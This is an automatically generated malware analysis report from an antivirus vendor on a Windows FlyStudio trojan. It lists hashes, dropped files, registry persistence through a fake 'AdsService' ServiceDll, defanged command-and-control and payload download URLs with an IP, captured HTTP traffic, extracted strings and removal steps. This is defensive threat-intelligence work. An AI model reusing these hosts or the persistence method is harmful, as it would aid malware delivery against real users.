Trojan.Win32.FlyStudio_8a34168adf

by malwarelabrobot on July 29th, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6183 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!8A34168ADFEB (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0PGD17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 8a34168adfebf655291073a2b140789f
SHA1: 1a7d5409c3aa0bc10cabd8b1a465e195f96427dd
SHA256: 7b9df1ac56ba8f69f68d53fdf619bc1311f4e45d0780ddd2cce37c7bd6855e2e
SSDeep: 6144:MHPJ417Frt OOLt2n75z0PGaogLfSaAONTKJmwObf1:2PmDqL8n75zYGWr9nTjf1
Size: 340496 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:29:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3408

The Trojan injects its code into the following process(es):

tip.exe:1804

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (132025 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29542 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin (170421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin (48521 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (242 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ip[1] (0 bytes)

Registry activity

The process %original file name%.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\System\CurrentControlSet\services\AdsService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdsServiceGroup" = "AdsService"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\8a34168adfebf655291073a2b140789f_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\services\AdsService]
"Description" = "AdsService"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tip.exe:1804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@499D.tmp,"

Dropped PE files

MD5 File path
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@499D.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241331 241664 4.55836 28d93a4866fee5e9c04a67655040d2ed
.rdata 245760 77038 77312 3.73342 3ed56b57cc626764796f03bdab466f39
.data 323584 9556 6144 2.76591 f2a1c0bf0a7b50b83d143a7502cd2aa5
.tls 335872 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 339968 488 512 3.30333 84e66ff2e405d01acdebe7444e41161c
.reloc 344064 12820 13312 4.49439 21abc5d2a6af9a076e50bf1671f700e0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 37

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
api.knsdknknndnfjenkjwwlekfj.com 108.61.212.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 25 Jul 2017 06:54:09 GMT
Accept-Ranges: bytes
ETag: "461abfd0125d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:24 GMT
Content-Length: 974336

<<< skipped >>>

GET /tip.bin HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:31 GMT
Content-Length: 304640

<<< skipped >>>

GET /api/report HTTP/1.1
Server: Ud0RCGD262adcB0Ry9AyXqcq0kAd0BtGCLA2ABY26qFLNowRXq0G6ycy3G4RA272cLxq4yNoAdikcEKLt98L0RMEJoKdLVFG7BAyy9FquLAyYkck3dt90RL20RlBoG4LRdFRcLWouyXyXEFy5RWoXEMoWqxRBdXRrG4qzE8yXq4L8L8qXEzErGwL4yXoFqrkJoaRJoW9adC2JoL20RhGDG6k3dckCkWBtEWEtEyV5RWoAyob
Server-Key: yLoEqRlrkBdG921pITZbVHhOSfvmQgejJPAtiY703asnDuzM6c4wWFX8KCNUx5
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: BmkC8QKEXRNgF3cqsdSLatn9UWGhifJw7zZrVbOo5T0lx4Y6M2IyjD1PHevpuA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:26 GMT



GET /api/ip HTTP/1.1

User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 28 Jul 2017 12:33:37 GMT
Content-Length: 71
{"ip":"194.242.96.218","iso_code":"UA","en":"Ukraine","cn":"........."
}..


The Trojan connects to the servers at the following location(s):

svchost.exe_160:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_1804:

`.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3408

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (132025 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (29542 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dll_service[1].bin (170421 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tip[1].bin (48521 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\report[1].txt (242 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
